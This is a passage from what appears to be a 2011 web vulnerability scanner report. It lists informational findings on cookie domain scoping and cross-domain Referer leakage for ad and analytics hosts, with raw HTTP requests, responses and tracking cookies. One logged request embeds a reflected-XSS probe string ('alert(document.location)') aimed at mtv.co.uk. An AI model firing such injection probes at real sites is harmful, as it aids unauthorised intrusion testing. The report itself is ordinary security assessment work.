Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266432%3D1%266286%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C56%2C4%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; put_2132=439524AE8C6B634E021F5F7802166020

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:40:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266432%3D1; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C120%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.41. http://rs.gwallet.com/r1/pixel/x420r5075003

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5075003

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5075003 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 11-Sep-2012 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=o5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 12-Sep-2016 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

10.42. http://usadmm.dotomi.com/dmm/servlet/dmm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000622%2C826000622%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1552553424%3Bs=403%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=1545%3Bsc=8%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 12 Sep 2011 12:48:27 GMT
X-Name: dmm-s02
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Wed, 11-Sep-2013 12:48:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Sat, 10-Sep-2016 12:48:27 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain


10.43. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s71862144072074

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s71862144072074?AQB=1&ndh=1&t=12%2F8%2F2011%2012%3A49%3A5%201%20300&pageName=%2F&g=http%3A%2F%2Fwww.mtv.co.uk%2F&r=http%3A%2F%2Fdrupal.org%2Fcases&ch=homepage&events=event16&c1=%2F&h1=index&c3=homepage&c4=not%20logged-in&c5=non-member&c16=homepage&c33=Monday&c34=5%3A30PM&c41=New&v45=Monday&v46=5%3A30PM&v49=homepage&s=1920x1200&c=16&j=1.6&v=Y&k=N&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:50:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFFD85149B5F-6000018C40017E3C|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 12:50:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:50:03 GMT
Last-Modified: Tue, 13 Sep 2011 12:50:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFFB-36A5-3043A8C4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www498
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.44. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s88215071307387

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s88215071307387?AQB=1&ndh=1&t=12%2F8%2F2011%2013%3A5%3A19%201%20300&pageName=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&g=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ch=generic&events=event16&h1=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&c3=generic&c4=not%20logged-in&c5=non-member&c16=generic&c33=Monday&c34=7%3A00PM&c41=New&v45=Monday&v46=7%3A00PM&v49=generic&s=1920x1200&c=16&j=1.7&v=Y&k=N&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava(TM)%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:05:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 13:05:02 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:05:02 GMT
Last-Modified: Tue, 13 Sep 2011 13:05:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E037E-2269-131ACF42"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www434
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11. Cross-domain Referer leakage
There are 59 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


11.1. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;pos=3;tile=3;sz=300x250;ord=4942? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4212
Date: Mon, 12 Sep 2011 12:48:16 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CKCkr7K8uOKiUhCsAhj6ATIIBpd1jLcWmfQ">
...[SNIP]...
2Q9lJLZYKC5iQA%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay1"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKCkr7K8uOKiUhCsAhj6ATIIBpd1jLcWmfQ" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB4IkdkP9tTtO5I46xsQfWuLHpAvWc9MsC5ZDF8yrAjbcB0J_LARABGAEgrYHOAzgAUKTyxKf7_____wFgyZ7-hsij_BqyARF3d3cubm93cHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQTaARlodHRwOi8vd3d3Lm5vd3B1YmxpYy5jb20vgAIBuAIYqAMB6AOZAegDE-gDpgX1AwAAAET1AzIgAAGgBgQ%26num%3D1%26sig%3DAOD64_2PWrtpk8dvhqB32Q9lJLZYKC5iQA%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay1" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.baycitizen.org%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEqSwZzT3D4ViR4QUdYXnLcqUe3zw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110719/abg.js"></script>
...[SNIP]...

11.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;dcopt=ist;tile=1;sz=728x90;ord=6895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4207
Date: Mon, 12 Sep 2011 12:48:15 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CP-ki_jf0ra76wEQ2AUYWjIIHtgmlK9nuec">
...[SNIP]...
9BzHzWgdi6CBkQ%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay2"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CP-ki_jf0ra76wEQ2AUYWjIIHtgmlK9nuec" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBWMLCj_9tTv7qA9mn6AbKnaX9BvWc9MsC_f7E8yrAjbcBsMaKARABGAEgrYHOAzgAUIHuprn7_____wFgyZ7-hsij_BqyARF3d3cubm93cHVibGljLmNvbboBCTcyOHg5MF9hc8gBBNoBGWh0dHA6Ly93d3cubm93cHVibGljLmNvbS-AAgG4AhioAwHoA5kB6AMT6AOmBfUDAAAARPUDMiAAAaAGBA%26num%3D1%26sig%3DAOD64_2J07mCVNhZnUbG9BzHzWgdi6CBkQ%26client%3Dca-pub-7479725245717969%26adurl%3Dhttp://www.baycitizen.org/%253Futm_source%253Dgoogle.com%2526utm_medium%253Dcpc%2526utm_campaign%253Ddisplayad%2526utm_content%253Ddisplay2" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3Dwww.baycitizen.org%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEqSwZzT3D4ViR4QUdYXnLcqUe3zw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

11.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;dcopt=ist;tile=1;sz=728x90;ord=9879? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 3913
Date: Mon, 12 Sep 2011 13:03:34 GMT

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
d%3D114%26t202kw%3Dipod-txt2" onFocus="ss('go to QuiBids.com/Auctions','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('go to QuiBids.com/Auctions','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPPh8uLIxN-ISBDYBRhaMggWMrJ3x0qlYw" border="0" width="728" height="90" /></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nowpublic.com/%26hl%3Den%26client%3Dca-pub-7479725245717969%26adU%3DQuiBids.com/Auctions%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFq3U1KxDr7hMMUA_eC6PrDtk6v5Q" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

11.4. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;tile=2;sz=300x250;ord=376? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4089
Date: Mon, 12 Sep 2011 13:03:34 GMT

<!doctype html><html><head><style><!--
